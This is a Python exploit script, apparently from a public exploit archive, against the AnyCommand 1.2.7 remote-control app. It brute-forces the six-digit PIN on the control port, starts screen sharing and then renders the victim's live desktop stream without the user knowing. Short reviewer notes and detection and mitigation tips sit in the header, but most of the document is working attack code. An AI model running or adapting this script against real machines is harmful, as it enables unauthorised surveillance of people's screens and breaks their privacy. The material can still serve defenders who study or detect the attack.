# Exploit Title: AnyCommand 1.2.7 - Authenticated Live Desktop Stream Access
# Date: 30/06/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://anycommand.io/
# Software Link: https://app.esigner.com/files/AnyCommandSetup/WSY-DLo0g/download
# Version: 1.2.7
# Tested on: Windows 10

'''
Description:
AnyCommand 1.2.7 allows unauthenticated attackers to brute-force the 6-digit
PIN over the control port (TCP/8000) and remotely activate the screen sharing
feature. Once authenticated, the attacker can fetch and view a live MJPEG
stream of the victim's desktop without any user interaction. This leads to
full passive surveillance of the remote system in real time.

Reviewer notes (what the code below shows):

* Control channel: newline-terminated text over TCP (default port 8000). The
  script waits for a banner, sends the PIN as JSON in one of two shapes, and
  treats the substring "AUTH_SUCCESS" in the reply as success.
* Every PIN guess opens a new TCP connection. The script's premise is that the
  service does not throttle or lock out repeated failures.
* The HTTP requests to port 8081 ("/" and "/stream?t=<ms>") carry no PIN,
  cookie or token. Whether the server ties the stream to the authenticated
  control session is not visible from this file -- TODO confirm.

Detection and mitigation pointers:

* Bursts of short-lived connections to the control port from one source, each
  carrying a different PIN, are the network signature of the guessing loop.
* Requests to :8081/stream with "X-Requested-With: com.polyhistor.remoteme"
  and "User-Agent: Mozilla/5.0" from an unexpected host match what this script
  sends.
* Rate limiting or lockout on failed PINs, a larger secret space, and
  restricting ports 8000/8081 to trusted hosts address the exposure described.
'''

import socket
import json
import time
import argparse
import sys
import requests
import re
import cv2
import numpy as np


def send_line(sock, message):
    """Send *message* on *sock* as a single newline-terminated, encoded line."""
    line = message + "\n"
    sock.sendall(line.encode())


def recv_quick(sock, timeout=1.0):
    """Read up to 4096 bytes from *sock*, waiting at most *timeout* seconds.

    Returns the decoded, stripped text, or "" when the read raises (a timeout
    included). The socket is switched back to blocking mode on the way out.
    """
    sock.settimeout(timeout)
    try:
        raw = sock.recv(4096)
        return raw.decode(errors='ignore').strip()
    except:
        # Bare except kept from the original: every failure reads as "no data".
        return ""
    finally:
        sock.settimeout(None)


def try_pin(host, port, pin_str):
    """Open one control connection and test a single PIN.

    Returns True when a reply contains "AUTH_SUCCESS"; False when the banner is
    empty, neither payload shape is accepted, or any exception is raised.
    """
    try:
        sock = socket.socket()
        sock.settimeout(2.0)
        sock.connect((host, port))

        banner = recv_quick(sock)
        if not banner:
            return False

        # The same PIN is offered in two JSON layouts, in this order.
        payloads = [
            json.dumps(shape)
            for shape in ({"pin": pin_str}, {"auth": {"pin": pin_str}})
        ]
        for payload in payloads:
            send_line(sock, payload)
            if "AUTH_SUCCESS" in recv_quick(sock):
                return True
        return False
    except:
        # Bare except kept from the original: it also absorbs a
        # KeyboardInterrupt raised while this attempt is in flight.
        return False
    finally:
        # NOTE(review): `sock` is unbound here if socket.socket() itself raised.
        sock.close()


def bruteforce(host, port, start=149506, end=999999):
    """Try every PIN from *start* to *end* inclusive, one connection per PIN.

    Args:
        host: address of the control service.
        port: TCP port of the control service.
        start: first PIN value tried (default 149506).
        end: last PIN value tried (default 999999).

    Returns the zero-padded PIN string that was accepted, or None when the
    range is exhausted or the loop is interrupted with Ctrl+C.
    """
    total = end - start + 1
    update_interval = 0.5
    last_update = time.time()

    print(f"[*] Bruteforcing PINs from {start} to {end} (total: {total})")
    print("[*] Press Ctrl+C to stop")

    try:
        for index, value in enumerate(range(start, end + 1)):
            pin_str = str(value).zfill(6)

            # Progress line is refreshed at most once per update_interval.
            if time.time() - last_update > update_interval:
                progress = (index / total) * 100
                print(
                    f"\r[>] Progress: {progress:.1f}% | Current PIN: {pin_str}",
                    end='',
                    flush=True,
                )
                last_update = time.time()

            if try_pin(host, port, pin_str):
                print(f"\n[+] SUCCESS! Found PIN: {pin_str}")
                return pin_str
    except KeyboardInterrupt:
        print("\n[!] Bruteforce interrupted by user")

    print("\n[-] Bruteforce completed. No valid PIN found.")
    return None


def authenticate_and_start_stream(host, port, pin):
    """Authenticate on the control port and send "screen_view:start".

    Returns True when a reply contained "AUTH_SUCCESS" and the reply to the
    screen_view command contained "OK"; False otherwise, including on any
    exception. The control socket is closed before returning.
    """
    sock = None
    try:
        sock = socket.create_connection((host, port), timeout=5)
        print(f"[*] Connected to control port {host}:{port}")

        time.sleep(0.5)
        banner = recv_quick(sock)
        print(f"[*] Banner: {banner}")

        time.sleep(0.3)
        print("[*] Attempting authentication...")

        auth_payloads = [
            json.dumps({"pin": pin}),
            json.dumps({"auth": {"pin": pin}}),
        ]
        authenticated = False
        for payload in auth_payloads:
            send_line(sock, payload)
            time.sleep(0.3)
            if "AUTH_SUCCESS" in recv_quick(sock):
                authenticated = True
                break

        if not authenticated:
            print("[-] Authentication failed")
            return False
        print("[✓] Authentication successful")

        print("[*] Sending screen_view command...")
        send_line(sock, "screen_view:start")
        time.sleep(0.8)

        screen_response = recv_quick(sock)
        if "OK" not in screen_response:
            print("[-] Failed to start screen view")
            return False

        print("[+] Screen view started successfully")
        sock.close()
        time.sleep(1.0)
        return True
    except Exception as e:
        print(f"[!] Control connection error: {e}")
        return False
    finally:
        # Closing twice on the success path mirrors the original behaviour.
        if sock:
            sock.close()


def fetch_root_page(host):
    """GET http://<host>:8081/ with the script's fixed header set.

    Returns True when the request completes (the status code is not checked)
    and False when it raises.
    """
    try:
        url = f"http://{host}:8081/"
        headers = {
            "Host": f"{host}:8081",
            "Connection": "keep-alive",
            "Upgrade-Insecure-Requests": "1",
            "User-Agent": "Mozilla/5.0",
            "Accept": "*/*",
            "X-Requested-With": "com.polyhistor.remoteme",
            "Accept-Encoding": "gzip, deflate",
            "Accept-Language": "en-US,en;q=0.9",
        }
        requests.get(url, headers=headers, timeout=10)
        return True
    except:
        return False


def fetch_screen_stream(host):
    """Read the multipart stream from port 8081 and display each JPEG frame.

    Returns False when the Content-Type is not multipart/x-mixed-replace or an
    exception other than KeyboardInterrupt reaches the outer handler; True when
    'q' is pressed, the stream ends, or Ctrl+C is caught by the outer handler.
    """
    timestamp_ms = int(time.time() * 1000)
    stream_url = f"http://{host}:8081/stream?t={timestamp_ms}"
    headers = {
        "Host": f"{host}:8081",
        "Connection": "keep-alive",
        "User-Agent": "Mozilla/5.0",
        "Accept": "image/*,*/*;q=0.8",
        "X-Requested-With": "com.polyhistor.remoteme",
        "Referer": f"http://{host}:8081/",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "en-US,en;q=0.9",
    }

    try:
        print("[*] Connecting to stream...")
        response = requests.get(stream_url, headers=headers, stream=True, timeout=10)

        content_type = response.headers.get("Content-Type", "")
        if "multipart/x-mixed-replace" not in content_type:
            print("[-] Stream is not MJPEG. Aborting.")
            return False

        print("[+] Stream connected. Rendering frames... Press 'q' to quit.\n")

        boundary = b"--frame"
        pending = b""
        for chunk in response.iter_content(chunk_size=1024):
            pending += chunk
            # Everything before each boundary marker is one complete part.
            while boundary in pending:
                part, pending = pending.split(boundary, 1)

                # The JPEG bytes follow the blank line that ends the part headers.
                body = re.search(b'\r\n\r\n(.*)', part, re.DOTALL)
                if body is None:
                    continue

                jpg_data = body.group(1)
                try:
                    pixels = np.frombuffer(jpg_data, dtype=np.uint8)
                    frame = cv2.imdecode(pixels, cv2.IMREAD_COLOR)
                    if frame is not None:
                        cv2.imshow("Remote Screen", frame)
                        if (cv2.waitKey(1) & 0xFF) == ord('q'):
                            cv2.destroyAllWindows()
                            return True
                except:
                    # Undecodable frames are skipped, as in the original.
                    continue
    except KeyboardInterrupt:
        print("\n[!] Stopped by user.")
        cv2.destroyAllWindows()
    except Exception as e:
        print(f"[!] Stream error: {e}")
        return False

    return True


def main():
    """Parse the command line and run the selected mode.

    With --bruteforce the PIN search runs and the function returns. Otherwise
    --pin is required and the control-port authentication, root page fetch and
    stream display run in that order, stopping at the first failure.
    """
    parser = argparse.ArgumentParser(
        description='AnyCommand Screen Stream Exploit by blue0x1 (Chokri Hammedi)'
    )
    parser.add_argument('--host', required=True, help='Target IP address')
    parser.add_argument('--port', type=int, default=8000, help='Target port')
    parser.add_argument('--pin', help='6-digit PIN')
    parser.add_argument('--bruteforce', action='store_true', help='Bruteforce PIN')
    args = parser.parse_args()

    print(f"[*] Starting exploit against {args.host}:{args.port}")

    if args.bruteforce:
        found_pin = bruteforce(args.host, args.port)
        if found_pin:
            print(f"[+] Use this PIN: --pin {found_pin}")
        return

    if not args.pin:
        print("[-] Please specify --pin or use --bruteforce")
        return

    if not authenticate_and_start_stream(args.host, args.port, args.pin):
        print("[-] Failed to start screen stream")
        return

    if not fetch_root_page(args.host):
        print("[-] Failed to fetch root page")
        return

    if not fetch_screen_stream(args.host):
        print("[-] Failed to fetch screen stream")
        return

    print("[+] Exploit completed successfully")


if __name__ == "__main__":
    main()